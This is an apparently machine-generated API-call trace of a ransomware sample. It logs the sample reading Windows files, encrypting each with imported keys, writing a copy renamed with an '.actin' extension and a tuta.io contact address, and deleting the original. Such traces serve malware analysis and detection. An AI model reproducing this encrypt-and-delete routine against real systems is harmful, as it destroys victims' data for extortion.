[0045.708] DeleteFileW (lpFileName="\\\\?\\C:\\$GetCurrent\\SafeOS\\GetCurrentRollback.ini" (normalized: "c:\\$getcurrent\\safeos\\getcurrentrollback.ini")) returned 1 [0045.709] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x38efb30 | out: pbBuffer=0x38efb30) returned 1 [0045.709] CreateFileW (lpFileName="\\\\?\\C:\\$GetCurrent\\SafeOS\\PartnerSetupComplete.cmd" (normalized: "c:\\$getcurrent\\safeos\\partnersetupcomplete.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x310 [0045.709] GetFileSizeEx (in: hFile=0x310, lpFileSize=0x38efac8 | out: lpFileSize=0x38efac8*=577) returned 1 [0045.709] CloseHandle (hObject=0x310) returned 1 [0045.709] GetFileAttributesW (lpFileName="\\\\?\\C:\\$GetCurrent\\SafeOS\\PartnerSetupComplete.cmd" (normalized: "c:\\$getcurrent\\safeos\\partnersetupcomplete.cmd")) returned 0x20 [0045.709] GetFileAttributesW (lpFileName="\\\\?\\C:\\$GetCurrent\\SafeOS\\PartnerSetupComplete.cmd.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\$getcurrent\\safeos\\partnersetupcomplete.cmd.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0045.709] CreateFileW (lpFileName="\\\\?\\C:\\$GetCurrent\\SafeOS\\PartnerSetupComplete.cmd" (normalized: "c:\\$getcurrent\\safeos\\partnersetupcomplete.cmd"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x310 [0045.709] SetFilePointerEx (in: hFile=0x310, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0045.710] SetFilePointerEx (in: hFile=0x310, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0045.710] CreateFileW (lpFileName="\\\\?\\C:\\$GetCurrent\\SafeOS\\PartnerSetupComplete.cmd.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\$getcurrent\\safeos\\partnersetupcomplete.cmd.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e4 [0045.710] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa20, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa7c | out: phKey=0x38efa7c*=0xf59168) returned 1 [0045.710] CryptSetKeyParam (hKey=0xf59168, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0045.710] ReadFile (in: hFile=0x310, lpBuffer=0x3e5c020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x38efaa4, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesRead=0x38efaa4*=0x241, lpOverlapped=0x0) returned 1 [0045.712] CryptEncrypt (in: hKey=0xf59168, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x250, dwBufLen=0x250 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x250) returned 1 [0045.712] WriteFile (in: hFile=0x2e4, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0x250, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0x250, lpOverlapped=0x0) returned 1 [0045.713] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa14, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa80 | out: phKey=0x38efa80*=0xf58e68) returned 1 [0045.713] CryptSetKeyParam (hKey=0xf58e68, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0045.713] CryptEncrypt (in: hKey=0xf58e68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x60, dwBufLen=0x60 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x60) returned 1 [0045.713] CryptDestroyKey (hKey=0xf58e68) returned 1 [0045.713] WriteFile (in: hFile=0x2e4, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0x112, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0x112, lpOverlapped=0x0) returned 1 [0045.713] CryptDestroyKey (hKey=0xf59168) returned 1 [0045.713] CloseHandle (hObject=0x310) returned 1 [0045.713] CloseHandle (hObject=0x2e4) returned 1 [0045.713] DeleteFileW (lpFileName="\\\\?\\C:\\$GetCurrent\\SafeOS\\PartnerSetupComplete.cmd" (normalized: "c:\\$getcurrent\\safeos\\partnersetupcomplete.cmd")) returned 1 [0045.714] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x38efb30 | out: pbBuffer=0x38efb30) returned 1 [0045.714] CreateFileW (lpFileName="\\\\?\\C:\\$GetCurrent\\SafeOS\\preoobe.cmd" (normalized: "c:\\$getcurrent\\safeos\\preoobe.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e4 [0045.715] GetFileSizeEx (in: hFile=0x2e4, lpFileSize=0x38efac8 | out: lpFileSize=0x38efac8*=74) returned 1 [0045.715] CloseHandle (hObject=0x2e4) returned 1 [0045.715] GetFileAttributesW (lpFileName="\\\\?\\C:\\$GetCurrent\\SafeOS\\preoobe.cmd" (normalized: "c:\\$getcurrent\\safeos\\preoobe.cmd")) returned 0x20 [0045.715] GetFileAttributesW (lpFileName="\\\\?\\C:\\$GetCurrent\\SafeOS\\preoobe.cmd.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\$getcurrent\\safeos\\preoobe.cmd.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0045.715] CreateFileW (lpFileName="\\\\?\\C:\\$GetCurrent\\SafeOS\\preoobe.cmd" (normalized: "c:\\$getcurrent\\safeos\\preoobe.cmd"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e4 [0045.715] SetFilePointerEx (in: hFile=0x2e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0045.716] SetFilePointerEx (in: hFile=0x2e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0045.716] CreateFileW (lpFileName="\\\\?\\C:\\$GetCurrent\\SafeOS\\preoobe.cmd.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\$getcurrent\\safeos\\preoobe.cmd.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x310 [0045.716] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa20, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa7c | out: phKey=0x38efa7c*=0xf58e68) returned 1 [0045.716] CryptSetKeyParam (hKey=0xf58e68, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0045.716] ReadFile (in: hFile=0x2e4, lpBuffer=0x3e5c020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x38efaa4, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesRead=0x38efaa4*=0x4a, lpOverlapped=0x0) returned 1 [0045.717] CryptEncrypt (in: hKey=0xf58e68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x50, dwBufLen=0x50 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x50) returned 1 [0045.717] WriteFile (in: hFile=0x310, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0x50, lpOverlapped=0x0) returned 1 [0045.718] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa14, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa80 | out: phKey=0x38efa80*=0xf58ee8) returned 1 [0045.718] CryptSetKeyParam (hKey=0xf58ee8, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0045.718] CryptEncrypt (in: hKey=0xf58ee8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x40, dwBufLen=0x40 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x40) returned 1 [0045.718] CryptDestroyKey (hKey=0xf58ee8) returned 1 [0045.718] WriteFile (in: hFile=0x310, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0xf2, lpOverlapped=0x0) returned 1 [0045.718] CryptDestroyKey (hKey=0xf58e68) returned 1 [0045.718] CloseHandle (hObject=0x2e4) returned 1 [0045.718] CloseHandle (hObject=0x310) returned 1 [0045.719] DeleteFileW (lpFileName="\\\\?\\C:\\$GetCurrent\\SafeOS\\preoobe.cmd" (normalized: "c:\\$getcurrent\\safeos\\preoobe.cmd")) returned 1 [0045.720] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x38efb30 | out: pbBuffer=0x38efb30) returned 1 [0045.720] CreateFileW (lpFileName="\\\\?\\C:\\$GetCurrent\\SafeOS\\SetupComplete.cmd" (normalized: "c:\\$getcurrent\\safeos\\setupcomplete.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x310 [0045.720] GetFileSizeEx (in: hFile=0x310, lpFileSize=0x38efac8 | out: lpFileSize=0x38efac8*=307) returned 1 [0045.720] CloseHandle (hObject=0x310) returned 1 [0045.720] GetFileAttributesW (lpFileName="\\\\?\\C:\\$GetCurrent\\SafeOS\\SetupComplete.cmd" (normalized: "c:\\$getcurrent\\safeos\\setupcomplete.cmd")) returned 0x20 [0045.720] GetFileAttributesW (lpFileName="\\\\?\\C:\\$GetCurrent\\SafeOS\\SetupComplete.cmd.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\$getcurrent\\safeos\\setupcomplete.cmd.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0045.720] CreateFileW (lpFileName="\\\\?\\C:\\$GetCurrent\\SafeOS\\SetupComplete.cmd" (normalized: "c:\\$getcurrent\\safeos\\setupcomplete.cmd"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x310 [0045.721] SetFilePointerEx (in: hFile=0x310, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0045.721] SetFilePointerEx (in: hFile=0x310, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0045.721] CreateFileW (lpFileName="\\\\?\\C:\\$GetCurrent\\SafeOS\\SetupComplete.cmd.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\$getcurrent\\safeos\\setupcomplete.cmd.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e4 [0045.721] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa20, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa7c | out: phKey=0x38efa7c*=0xf58e68) returned 1 [0045.721] CryptSetKeyParam (hKey=0xf58e68, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0045.721] ReadFile (in: hFile=0x310, lpBuffer=0x3e5c020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x38efaa4, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesRead=0x38efaa4*=0x133, lpOverlapped=0x0) returned 1 [0045.722] CryptEncrypt (in: hKey=0xf58e68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x140, dwBufLen=0x140 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x140) returned 1 [0045.722] WriteFile (in: hFile=0x2e4, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0x140, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0x140, lpOverlapped=0x0) returned 1 [0045.727] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa14, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa80 | out: phKey=0x38efa80*=0xf59168) returned 1 [0045.727] CryptSetKeyParam (hKey=0xf59168, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0045.727] CryptEncrypt (in: hKey=0xf59168, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x50, dwBufLen=0x50 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x50) returned 1 [0045.727] CryptDestroyKey (hKey=0xf59168) returned 1 [0045.727] WriteFile (in: hFile=0x2e4, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0x102, lpOverlapped=0x0) returned 1 [0045.727] CryptDestroyKey (hKey=0xf58e68) returned 1 [0045.727] CloseHandle (hObject=0x310) returned 1 [0045.728] CloseHandle (hObject=0x2e4) returned 1 [0045.728] DeleteFileW (lpFileName="\\\\?\\C:\\$GetCurrent\\SafeOS\\SetupComplete.cmd" (normalized: "c:\\$getcurrent\\safeos\\setupcomplete.cmd")) returned 1 [0045.729] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x38efb30 | out: pbBuffer=0x38efb30) returned 1 [0045.729] CreateFileW (lpFileName="\\\\?\\C:\\$Recycle.Bin\\S-1-5-18\\desktop.ini" (normalized: "c:\\$recycle.bin\\s-1-5-18\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e4 [0045.729] GetFileSizeEx (in: hFile=0x2e4, lpFileSize=0x38efac8 | out: lpFileSize=0x38efac8*=129) returned 1 [0045.729] CloseHandle (hObject=0x2e4) returned 1 [0045.729] GetFileAttributesW (lpFileName="\\\\?\\C:\\$Recycle.Bin\\S-1-5-18\\desktop.ini" (normalized: "c:\\$recycle.bin\\s-1-5-18\\desktop.ini")) returned 0x26 [0045.729] GetFileAttributesW (lpFileName="\\\\?\\C:\\$Recycle.Bin\\S-1-5-18\\desktop.ini.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\$recycle.bin\\s-1-5-18\\desktop.ini.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0045.729] CreateFileW (lpFileName="\\\\?\\C:\\$Recycle.Bin\\S-1-5-18\\desktop.ini" (normalized: "c:\\$recycle.bin\\s-1-5-18\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e4 [0045.730] SetFilePointerEx (in: hFile=0x2e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0045.730] SetFilePointerEx (in: hFile=0x2e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0045.730] CreateFileW (lpFileName="\\\\?\\C:\\$Recycle.Bin\\S-1-5-18\\desktop.ini.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\$recycle.bin\\s-1-5-18\\desktop.ini.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x310 [0045.731] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa20, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa7c | out: phKey=0x38efa7c*=0xf58e68) returned 1 [0045.731] CryptSetKeyParam (hKey=0xf58e68, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0045.731] ReadFile (in: hFile=0x2e4, lpBuffer=0x3e5c020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x38efaa4, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesRead=0x38efaa4*=0x81, lpOverlapped=0x0) returned 1 [0045.760] CryptEncrypt (in: hKey=0xf58e68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x90, dwBufLen=0x90 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x90) returned 1 [0045.760] WriteFile (in: hFile=0x310, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0x90, lpOverlapped=0x0) returned 1 [0045.761] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa14, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa80 | out: phKey=0x38efa80*=0xf58ee8) returned 1 [0045.761] CryptSetKeyParam (hKey=0xf58ee8, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0045.761] CryptEncrypt (in: hKey=0xf58ee8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x40, dwBufLen=0x40 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x40) returned 1 [0045.761] CryptDestroyKey (hKey=0xf58ee8) returned 1 [0045.761] WriteFile (in: hFile=0x310, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0xf2, lpOverlapped=0x0) returned 1 [0045.762] CryptDestroyKey (hKey=0xf58e68) returned 1 [0045.762] CloseHandle (hObject=0x2e4) returned 1 [0045.762] CloseHandle (hObject=0x310) returned 1 [0045.762] DeleteFileW (lpFileName="\\\\?\\C:\\$Recycle.Bin\\S-1-5-18\\desktop.ini" (normalized: "c:\\$recycle.bin\\s-1-5-18\\desktop.ini")) returned 1 [0045.763] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x38efb30 | out: pbBuffer=0x38efb30) returned 1 [0045.763] CreateFileW (lpFileName="\\\\?\\C:\\$Recycle.Bin\\S-1-5-21-1051304884-625712362-2192934891-1000\\desktop.ini" (normalized: "c:\\$recycle.bin\\s-1-5-21-1051304884-625712362-2192934891-1000\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x310 [0045.763] GetFileSizeEx (in: hFile=0x310, lpFileSize=0x38efac8 | out: lpFileSize=0x38efac8*=129) returned 1 [0045.764] CloseHandle (hObject=0x310) returned 1 [0045.764] GetFileAttributesW (lpFileName="\\\\?\\C:\\$Recycle.Bin\\S-1-5-21-1051304884-625712362-2192934891-1000\\desktop.ini" (normalized: "c:\\$recycle.bin\\s-1-5-21-1051304884-625712362-2192934891-1000\\desktop.ini")) returned 0x26 [0045.764] GetFileAttributesW (lpFileName="\\\\?\\C:\\$Recycle.Bin\\S-1-5-21-1051304884-625712362-2192934891-1000\\desktop.ini.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\$recycle.bin\\s-1-5-21-1051304884-625712362-2192934891-1000\\desktop.ini.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0045.764] CreateFileW (lpFileName="\\\\?\\C:\\$Recycle.Bin\\S-1-5-21-1051304884-625712362-2192934891-1000\\desktop.ini" (normalized: "c:\\$recycle.bin\\s-1-5-21-1051304884-625712362-2192934891-1000\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x310 [0045.764] SetFilePointerEx (in: hFile=0x310, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0045.764] SetFilePointerEx (in: hFile=0x310, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0045.764] CreateFileW (lpFileName="\\\\?\\C:\\$Recycle.Bin\\S-1-5-21-1051304884-625712362-2192934891-1000\\desktop.ini.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\$recycle.bin\\s-1-5-21-1051304884-625712362-2192934891-1000\\desktop.ini.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e4 [0045.764] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa20, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa7c | out: phKey=0x38efa7c*=0xf58e68) returned 1 [0045.764] CryptSetKeyParam (hKey=0xf58e68, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0045.764] ReadFile (in: hFile=0x310, lpBuffer=0x3e5c020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x38efaa4, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesRead=0x38efaa4*=0x81, lpOverlapped=0x0) returned 1 [0045.764] CryptEncrypt (in: hKey=0xf58e68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x90, dwBufLen=0x90 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x90) returned 1 [0045.764] WriteFile (in: hFile=0x2e4, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0x90, lpOverlapped=0x0) returned 1 [0045.765] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa14, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa80 | out: phKey=0x38efa80*=0xf58ee8) returned 1 [0045.765] CryptSetKeyParam (hKey=0xf58ee8, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0045.765] CryptEncrypt (in: hKey=0xf58ee8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x40, dwBufLen=0x40 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x40) returned 1 [0045.765] CryptDestroyKey (hKey=0xf58ee8) returned 1 [0045.765] WriteFile (in: hFile=0x2e4, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0xf2, lpOverlapped=0x0) returned 1 [0045.766] CryptDestroyKey (hKey=0xf58e68) returned 1 [0045.766] CloseHandle (hObject=0x310) returned 1 [0045.766] CloseHandle (hObject=0x2e4) returned 1 [0045.766] DeleteFileW (lpFileName="\\\\?\\C:\\$Recycle.Bin\\S-1-5-21-1051304884-625712362-2192934891-1000\\desktop.ini" (normalized: "c:\\$recycle.bin\\s-1-5-21-1051304884-625712362-2192934891-1000\\desktop.ini")) returned 1 [0045.767] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x38efb30 | out: pbBuffer=0x38efb30) returned 1 [0045.767] CreateFileW (lpFileName="\\\\?\\C:\\$WINRE_BACKUP_PARTITION.MARKER" (normalized: "c:\\$winre_backup_partition.marker"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x308 [0045.812] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x38efac8 | out: lpFileSize=0x38efac8*=0) returned 1 [0045.812] CloseHandle (hObject=0x308) returned 1 [0045.812] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x38efb30 | out: pbBuffer=0x38efb30) returned 1 [0045.812] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1028\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1028\\setupresources.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x318 [0045.815] GetFileSizeEx (in: hFile=0x318, lpFileSize=0x38efac8 | out: lpFileSize=0x38efac8*=14168) returned 1 [0045.815] CloseHandle (hObject=0x318) returned 1 [0045.815] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1028\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1028\\setupresources.dll")) returned 0x80 [0045.815] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1028\\SetupResources.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\588bce7c90097ed212\\1028\\setupresources.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0045.815] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1028\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1028\\setupresources.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x318 [0045.815] SetFilePointerEx (in: hFile=0x318, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0045.816] SetFilePointerEx (in: hFile=0x318, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0045.816] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1028\\SetupResources.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\588bce7c90097ed212\\1028\\setupresources.dll.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0045.816] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa20, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa7c | out: phKey=0x38efa7c*=0xf71640) returned 1 [0045.816] CryptSetKeyParam (hKey=0xf71640, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0045.816] ReadFile (in: hFile=0x318, lpBuffer=0x3e5c020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x38efaa4, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesRead=0x38efaa4*=0x3758, lpOverlapped=0x0) returned 1 [0045.818] CryptEncrypt (in: hKey=0xf71640, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x3760, dwBufLen=0x3760 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x3760) returned 1 [0045.818] WriteFile (in: hFile=0x31c, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0x3760, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0x3760, lpOverlapped=0x0) returned 1 